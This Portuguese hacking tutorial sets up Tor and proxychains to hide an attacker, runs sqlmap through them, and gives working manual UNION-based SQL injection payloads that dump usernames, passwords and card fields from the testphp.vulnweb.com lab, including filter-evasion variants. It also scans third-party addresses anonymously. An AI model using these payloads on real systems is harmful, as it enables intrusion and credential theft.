) Manual SQL Injection Kali tool - Sqlmap *** Página melhor visualizada no " navegador Chrome "
01 - Leis 02 - Proxychains 03 - Firefox add-ons ( Tor ) 04 - Tor Brower HackBar 05 - Online Labs 06 - SQL Injection - Manual injection ( example 1 ) 07 - Some more manual injection command examples 08 - Kali Linux - installing and setting up 09 - SQL Injetion with sqlmap ( example 2 ) 10 - Some more sqlmap parameters 11 - Setting up dvwa lab 12 - Cracking passwords with hydra 13 - Cracking passwords with john the ripper 14 - uploaders 15 - dirb 16 - nikto 17 - uniscan 18 - compiling c 19 - perl 20 - python 21 - shell encoding 22 - Compactando - zip, rar, tar.gz, bz2, tar, bz2 23 - 10 minute email 24 - Encryt x Decrypt Text
Apelidada de Lei Carolina Dieckmann, a Lei dos Crimes Cibernéticos (12.737/2012) tipifica como crimes infrações relacionadas ao meio eletrônico, como invadir computado- res, violar dados de usuários ou "derrubar" sites. O projeto que deu origem à lei (PLC 35/2012) foi elaborado na época em que fotos ínti- mas da atriz Carolina Dieckmann foram copiadas de seu computador e espalhadas pela rede mundial de computadores. O texto era reividicado pelo sistema financeiro, dada a quan- tidade de golpes aplicados pela internet. Entrou em vigor no dia 02/04/2013 Invasão de dispositivo informático: Pode dar uma punição de prisão que via de 3 meses à um ano, além de multa. Obter pela invasão conteúdo de “comunicações eletrônicas privadas, segredos comerciais ou industriais, informações sigilosas”: Pena de 6 meses à 2 anos de prisão, além da multa. O mesmo ocorre se o delito envolver a divulgação, comercialização ou transmissão a terceiros, por meio de venda ou repasse gratuito, do material obtido com a invasão. A lei prevê ainda o aumento das penas de um sexto a um terço se a invasão causar pre- juízo econômico e de um a dois terços “se houver divulgação, comercialização ou trans- missão a terceiro, a qualquer título, dos dados ou informações obtidos”. As penas também poderão ser aumentadas de um terço à metade se o crime for praticado contra o presidente da República, presidentes do Supremo Tribunal Federal, da Câmara, do Senado, de assembleias e câmaras legislativas, de câmaras municipais ou dirigentes máximos “da administração direta e indireta federal, estadual, municipal ou do Distrito Federal”.
O Tor é um software livre e de código aberto para proteger o anonimato pessoal ao navegar a Internet e atividades online, protegendo contra a censura e protegendo a privacidade pessoal. A maioria das distribuições GNU/Linux disponibilizam pacotes do Tor, embora haja versões para diferentes sistemas operacionais, tais como Windows e Mac OS. A rede Tor é uma rede de túneis http (com tls) sobrejacente à Internet, onde os roteadores da rede são computadores de usuários comuns rodando um programa e com acesso web (apenas). O objetivo principal do projeto é garantir o anonimato do usuário que está acessando a web. O Tor-cliente é um programa que deve ser instalado no computador e que funciona como um proxy socks 5 para este. É fornecido um bind, geralmente na porta 9050 local da máquina. Em seguida, os programas devem ser configurados para usar um servidor proxy socks 5 e apontados para o endereço localhost (127.0.0.1). Siga os passos a seguinte para instalarmos e configurarmos: Install tor from the respository because there is always updated. Copie e cole as duas linhas abaixo no terminal: echo 'deb https://deb.torproject.org/torproject.org stretch main deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list Then, download the Tor Project package signing key and import it into your APT keyring. wget -O- 'https://pgp.mit.edu/pks/lookup?op=get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add - A linha acima é a mesma que esta abaixo, apenas quebrei para melhor visualização. wget -O- 'https://pgp.mit.edu/pks/lookup?op= get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add - ------- apt-get update apt-get install tor torsocks polipo privoxy proxychains ------- tor & Mar 15 14:22:56.060 [notice] Tor 0.2.9.9 (git-1d8323c042800718) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.1.0c and Zlib 1.2.8. Mar 15 14:22:56.061 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning Mar 15 14:22:56.062 [notice] Read configuration file "/etc/tor/torrc". Mar 15 14:22:56.069 [notice] Opening Socks listener on 127.0.0.1:9050 Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip. Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6. Mar 15 14:22:56.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't. Mar 15 14:22:56.000 [notice] Bootstrapped 0%: Starting Mar 15 14:22:57.000 [notice] Bootstrapped 5%: Connecting to directory server Mar 15 14:22:57.000 [notice] Bootstrapped 10%: Finishing handshake with directory server Mar 15 14:22:57.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection Mar 15 14:22:58.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus Mar 15 14:22:58.000 [notice] Bootstrapped 25%: Loading networkstatus consensus Mar 15 14:22:59.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus. Mar 15 14:23:00.000 [notice] Bootstrapped 40%: Loading authority key certs Mar 15 14:23:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors Mar 15 14:23:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7344, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.) Mar 15 14:23:01.000 [notice] Bootstrapped 50%: Loading relay descriptors Mar 15 14:23:03.000 [notice] Bootstrapped 55%: Loading relay descriptors Mar 15 14:23:03.000 [notice] Bootstrapped 61%: Loading relay descriptors Mar 15 14:23:03.000 [notice] Bootstrapped 70%: Loading relay descriptors Mar 15 14:23:03.000 [notice] Bootstrapped 75%: Loading relay descriptors Mar 15 14:23:04.000 [notice] Bootstrapped 80%: Connecting to the Tor network Mar 15 14:23:05.000 [notice] Bootstrapped 90%: Establishing a Tor circuit Mar 15 14:23:06.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working. Mar 15 14:23:06.000 [notice] Bootstrapped 100%: Done ------- tor --verify-config Dec 10 11:29:52.237 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5. Dec 10 11:29:52.237 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning Dec 10 11:29:52.238 [notice] Read configuration file "/etc/tor/torrc". Dec 10 11:29:52.241 [warn] You are running Tor as root. You don't need to, and you probably shouldn't. Configuration was valid ------- tor -f /path/to/your/own/torrc Dec 10 11:30:45.233 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5. Dec 10 11:30:45.233 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning Dec 10 11:30:45.233 [warn] Unable to open configuration file "/path/to/your/own/torrc". Dec 10 11:30:45.234 [err] Reading config failed--see warnings above. ------- netstat -tanp | grep tor tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 9730/tor tcp 0 0 192.168.2.199:52786 134.119.3.164:9001 ESTABLISHED 9730/tor tcp 0 0 192.168.2.199:60570 163.172.185.132:443 ESTABLISHED 9730/tor tcp 0 0 192.168.2.199:56166 82.196.12.245:443 ESTABLISHED 9730/tor tcp 0 0 192.168.2.199:37466 139.59.210.164:443 ESTABLISHED 9730/tor tcp 0 0 192.168.2.199:37472 198.96.155.3:5001 ESTABLISHED 9730/tor tcp 0 0 192.168.2.199:48184 193.171.202.146:9001 ESTABLISHED 9730/tor ------- netstat -antlp | grep LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 830/sshd tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 3166/tor tcp 0 0 127.0.0.1:8123 0.0.0.0:* LISTEN 2135/polipo tcp6 0 0 :::22 :::* LISTEN 830/sshd ------- netstat -tanp | grep tor tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 3166/tor tcp 0 0 192.168.142.129:49378 193.70.43.76:9001 ESTABLISHED 3166/tor tcp 0 0 192.168.142.129:36678 194.88.105.97:443 ESTABLISHED 3166/tor tcp 0 0 192.168.142.129:44512 144.76.236.14:443 ESTABLISHED 3166/tor tcp 0 0 192.168.142.129:49972 185.100.86.128:9001 ESTABLISHED 3166/tor tcp 0 0 192.168.142.129:50070 176.10.104.240:443 ESTABLISHED 3166/tor ------- nano /etc/proxychains.conf dynamic_chain strict_chain random_chain proxy_dns tcp_read_time_out 15000 tcp_connect_time_out 8000 socks4 127.0.0.1 9050 socks5 127.0.0.1 9050 ctrl + x + y + enter ( salvar e sair do arquivo ) ------- service tor restart ------- service tor status ● tor.service - Anonymizing overlay network for TCP (multi-instance-master) Loaded: loaded (/lib/systemd/system/tor.service; disabled; vendor preset: disabled) Active: active (exited) since Sat 2018-12-01 11:50:09 EST; 2min 4s ago Process: 2068 ExecStart=/bin/true (code=exited, status=0/SUCCESS) Main PID: 2068 (code=exited, status=0/SUCCESS) Dec 01 11:50:09 kali systemd[1]: Starting Anonymizing overlay network for TCP (multi-instance-master)... Dec 01 11:50:09 kali systemd[1]: Started Anonymizing overlay network for TCP (multi-instance-master). ------- Parando processo. service privoxy stop && service tor stop ------- Para permacer anonimo inicie os processos abaixo.
service privoxy start && service tor start
------- Atualizando sistema. apt-get update ------- Mostrando status do tor. service tor status tor.service - LSB: Starts The Onion Router daemon processes Loaded: loaded (/etc/init.d/tor) Active: active (running) since Mon 2016-06-13 09:21:08 EDT; 37min ago Process: 1859 ExecStop=/etc/init.d/tor stop (code=exited, status=0/SUCCESS) Process: 1870 ExecStart=/etc/init.d/tor start (code=exited, status=0/SUCCESS) CGroup: /system.slice/tor.service 1881 /usr/bin/tor --defaults-torrc /usr/share/tor/tor-service-defaults-torrc --hush Jun 13 09:21:08 kali tor[1870]: Starting tor daemon...done. ------- Verificando. netstat -ant | grep 8118 tcp 0 0 127.0.0.1:8118 0.0.0.0:* LISTEN
tcp6 0 0 ::1:8118 :::* LISTEN
------- netstat -na | grep 9050 tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN ------- netstat -tanp | grep tor tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor tcp 0 0 192.168.1.102:38764 91.109.29.120:443 ESTABLISHED 1881/tor ------- tail -f /var/log/tor/log
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Jun 13 16:50:10.000 [notice] Bootstrapped 0%: Starting
Jun 13 16:50:10.000 [notice] Bootstrapped 5%: Connecting to directory server
Jun 13 16:50:10.000 [notice] We now have enough directory information to build circuits.
Jun 13 16:50:10.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Jun 13 16:50:11.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
Jun 13 16:50:11.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Jun 13 16:50:13.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Jun 13 16:50:13.000 [notice] Bootstrapped 100%: Done
------- tor
Jun 13 16:45:51.026 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 16:45:51.026 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 16:45:51.027 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 16:45:51.029 [notice] Opening Socks listener on 127.0.0.1:9050
Jun 13 16:45:51.029 [warn] Could not bind to 127.0.0.1:9050: Address already in use. Is Tor already running?
Jun 13 16:45:51.029 [notice] Opening DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [notice] Closing partially-constructed DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [warn] Failed to parse/validate config: Failed to bind one of the listener ports.
Jun 13 16:45:51.030 [err] Reading config failed--see warnings above.
------- tor --verify-config
Jun 13 17:02:51.335 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:02:51.336 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:02:51.336 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 17:02:51.339 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.Configuration was valid -------
tor -f /path/to/your/own/torrc
Jun 13 17:04:41.936 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:04:41.936 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:04:41.936 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Jun 13 17:04:41.936 [err] Reading config failed--see warnings above.
------- Vamos verificar qual é o ip do nosso servidor. export http_proxy="http://localhost:8118" ------- curl ipecho.net/plain ; echo 198.50.200.135 ------- Vamos ver de onde é este ip. whois 198.50.200.135 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html # # If you see inaccuracies in the results, please report at # https://www.arin.net/public/whoisinaccuracy/index.xhtml # NetRange: 198.50.128.0 - 198.50.255.255 CIDR: 198.50.128.0/17 NetName: OVH-ARIN-6 NetHandle: NET-198-50-128-0-1 Parent: NET198 (NET-198-0-0-0-0) NetType: Direct Allocation OriginAS: AS16276 Organization: OVH Hosting, Inc. (HO-2) RegDate: 2013-03-07 Updated: 2013-03-07 Ref: https://whois.arin.net/rest/net/NET-198-50-128-0-1 OrgName: OVH Hosting, Inc. OrgId: HO-2 Address: 800-1801 McGill College City: Montreal StateProv: QC PostalCode: H3A 2N4 Country: CA RegDate: 2011-06-22 Updated: 2016-03-25 Ref: https://whois.arin.net/rest/org/HO-2 ------- Usando proxychains com nmap. proxychains nmap -sS ip_x ------- proxychains nmap -sT -PN -n -sV -p 80,443,21,22 ip_x ------- proxychains nmap -Pn -sT -n -sV -p 21,22,23,53,80,110,139,143,443 ip_x ------- nmap -Pn -sT -p 80,443,21,22,23 80.14.163.161 Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 15:41 EDT Nmap scan report for LStLambert-656-1-112-161.w80-14.abo.wanadoo.fr (80.14.163.161) Host is up. PORT STATE SERVICE 21/tcp filtered ftp 22/tcp filtered ssh 23/tcp filtered telnet 80/tcp filtered http 443/tcp filtered https Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds ------- proxychains nmap -sV -Pn -p80,22,135 8.8.8.8 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 14:14 EDT Nmap scan report for google-public-dns-a.google.com (8.8.8.8) Host is up (0.038s latency). PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp filtered http 135/tcp filtered msrpc ------- netstat -plant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1215/sshd tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor tcp 0 0 192.168.1.102:38814 91.109.29.120:443 ESTABLISHED 1881/tor tcp 0 252 192.168.1.102:22 192.168.1.100:50185 ESTABLISHED 1536/1 tcp6 0 0 ::1:8118 :::* LISTEN 1854/privoxy tcp6 0 0 :::22 :::* LISTEN 1215/sshd ------- O ip acima é do Kali = 192.168.1.102 Verificando ip.. whois 91.109.29.120 | grep address
address: Kleyer Strasse 79 / Tor 13
address: 60326
address: Frankfurt
address: GERMANY
address: Kleyerstrasse 79 / Tor 13
address: 60326 Frankfurt am Main
address: Germany
------- Vamos usar proxychains com sqlmap para efetuar ataque anônimo de SQL Injection. proxychains sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --flush-session --time-sec=5 --tor-type=socks5 --tor-port=9050 ProxyChains-3.1 (http://proxychains.sf.net) _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 14:26:21 |DNS-request| testphp.vulnweb.com |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK |DNS-response| testphp.vulnweb.com is 176.28.50.165 [14:26:22] [INFO] testing connection to the target URL |DNS-request| testphp.vulnweb.com |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK |DNS-response| testphp.vulnweb.com is 176.28.50.165 |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-|S-chain|-<>-127.0.0.1:9050-<><>- 176.28.50.165:80-<><>-OK<><>-OK [14:26:25] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS <><>-OK [14:26:26] [INFO] testing if the target URL is stable<><>-OK [14:26:26] [INFO] target URL is stable8.50.165:80- [14:26:26] [INFO] testing if GET parameter 'artist' is dynamic <><>-OK [14:26:27] [INFO] confirming that GET parameter 'artist' is dynamic <><>-OK [14:26:28] [INFO] GET parameter 'artist' is dynamic <><>-OK [14:26:29] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')<><>-OK [14:26:30] [INFO] testing for SQL injection on GET parameter 'artist' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [14:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:26:46] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [14:26:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' <><>-OK [14:26:49] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'<><>-OK [14:26:50] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' <><>-OK [14:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' <><>-OK [14:26:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' <><>-OK [14:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' <><>-OK [14:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' <><>-OK [14:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)' <><>-OK [14:26:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'<><>-OK [14:26:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)' <><>-OK [14:26:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' <><>-OK [14:26:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'<><>-OK [14:26:57] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:26:58] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' <><>-OK [14:26:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' <><>-OK [14:26:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' <><>-OK [14:27:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' <><>-OK [14:27:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' <><>-OK [14:27:02] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace BIGINT UNSIGNED) ' <><>-OK [14:27:02] [INFO] testing 'MySQL inline queries'0-<><>-OK [14:27:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' <><>-OK [14:27:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' <><>-OK [14:27:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' <><>-OK [14:27:06] [INFO] testing 'MySQL > 5.0.11 stacked queries' <><>-OK [14:27:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' <><>-OK [14:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' <><>-OK [14:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:20] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable [14:27:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [14:27:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:23] [INFO] target URL appears to have 3 columns in query<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:29] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable <><>-OK GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] <><>-OK n sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 9518=9518 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NsJj) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-7658 UNION ALL SELECT NULL,NULL,CONCAT(0x7162706a71, 0x54754c5165526665574370556d6777466a7541764c6d7643505265597a507274585973536a476359, 0x7178627671)-- - --- [14:32:37] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [14:32:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 14:32:37
Tools you should have in your computer. The Five Greatest Firefox Tools for Hacking! Here is a list of the greatest Firefox add-ons for Hacking: 1. Hackbar – Execute Commands like SQL Injection, XSS and more… 2. Live HTTP Headers – Capture all (HEADERS) of a Page (Used when uploading a shell….) 3. SQL Inject Me – SQL Injection Commands and Automatations. 4. Firebug – Edit a Website’s source code. 5. Temper Data – Watch the data that your computer sends to a website and the data the website sends to you. 6. Tor Brower - Download and install Tor.
Why to use Tor Browser? The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked. Download Tor Browser: https://www.torproject.org/download/download.html.en The Tor version is 4.5.3 ( older ), this way we are able to use the HackBar. Newer version do not allow the hackbar.HackBar is a Firefox extension for penetration testers. Hackbar extends the address bar of Firefox and thus provides enough space for long injection URLs during penetration testing. Hackbar also has some additional features including the ability to perform encryption, encoding, decryption, POST data manipulation, inject code generation etc. This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what your doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of google.
Example using hackbar, notice it has many options ( tools ) ...
Add on "anonymox" to browse websites anonymously.
Online labs. 
Para testarmos possíveis vulnerabilidades de Sql Injection temos algumas ferramentas que verificam se o banco de dados está ou não vulnerável.Para este aprendizado usaremos o laboratório online abaixo criado para tal finalidade: http://testphp.vulnweb.com Vamos começar clicando abaixo em artists
Clique no primeiro registro onde aponta a setinha vermelha. http://testphp.vulnweb.com/artists.php
Veja na imagem abaixo o registro foi selecionado. http://testphp.vulnweb.com/artists.php?artist=1
Agora vamos adicioar um apostrofe simples logo apos o codigo 1 para detectarmos se nosso alvo possui falha de SQL Injection ( 1' ) http://testphp.vulnweb.com/artists.php?artist=1' O erro abaixo indica que esta url esta vulneravel.
Agora vamos usar order by para descobrirmos o número das tabelas. Vá acrescentando os números sequencialmente, 1,2,3,4,5... até o erro aparecer. Quando o erro aparecer, então significa que o número anterior é o número total de tabelas no banco de dados atualda página. Na url digite a linha abaixo: http://testphp.vulnweb.com/artists.php?artist=1 order by 1,2,3,4
Descobrindo a versao do sistema. Na linha da url digite a linha abaixo: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,version()
Descobrindo o usuario. http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,user()
Agora vamos identificar onde estão as tabelas. É importante setar um ID que não existe, assim ele irá identificar as tabelas com seus números correspondentes, neste caso deduzindo, supondo que seja 100 ... http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,3
Veja abaixo, coluna 3 e vuneravel.
Url abaixo e uma unica linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(table_name) from information_schema.tables
Acima as tabelas foram listadas horizontalmente, abaixo veremos como listar de forma vertical. Para listar as tabelas em uma unica coluna teremos que converter <br> para hexadecimal e diante do hexa precisaremos adicionar 0x
<br> = 0x3c62723e Para converter <br> para hexadecimal use o link abaixo: http://online-toolz.com/tools/text-hex-convertor.phpDiante no valor hexa adicione 0x = 0x3c62723e Vamos listar as tabelas verticalmente. Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(table_name,0x3c62723e) from information_schema.tables
Vamos listar todos as colunas da tabela artists. Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(table_name,0x3c62723e) from information_schema.tables where table_schema=database()
Vamos listar todos os campos da tabela artists. Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(column_name) from information_schema.columns where table_name='users'No link abaixo converteremos os dois pontos ( : ) para 0x3a http://www.rapidtables.com/convert/number/hex-to-ascii.htm
Com as colunas selecionadas, iremos efetuar a apresentação dos dados encontrados nas colunas uname e pass da tabela users Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, concat(uname,0x3a,pass) from users Login : test Password: test
Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union select 1,2,concat('Versao ===> ',' :: ',version())------------------------------------------------ Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union select 1,2,(select+count(column_name) from information_schema.columns) ---------------------------------------------- Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union select 1,2,(select count(table_name) from information_schema.tables) http://testphp.vulnweb.com/artists.php?artist=100 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1 http://testphp.vulnweb.com/artists.php?artist=100 /*!50000uNiOn*/ /*!50000select*/ all 1,2,/*!50000 group_concat(table_name)*/ /*!50000from*/ information_schema.tables where table_schema=database() http://testphp.vulnweb.com/artists.php?artist=100 /*!50000uNiOn*/ /*!50000select*/ all 1,2,/*!50000 gRoUp_cOnCat(table_name,0x3c62723e)*/ /*!50000 from*/ information_schema.tables where table_schema=database() http://testphp.vulnweb.com/artists.php?artist=100 union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns) where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) Vuln column: 3 http://testphp.vulnweb.com/artists.php?artist=-1 /*!50000union*/ /*!50000select*/ 1,2,database() http://testphp.vulnweb.com/artists.php?artist=-1 /*!50000union*/ /*!50000select*/ 1,2,user() http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,pass,cc FROM users WHERE uname='test' Vuln column: 7 http://testphp.vulnweb.com/listproducts.php?cat=3 UNION ALL SELECT 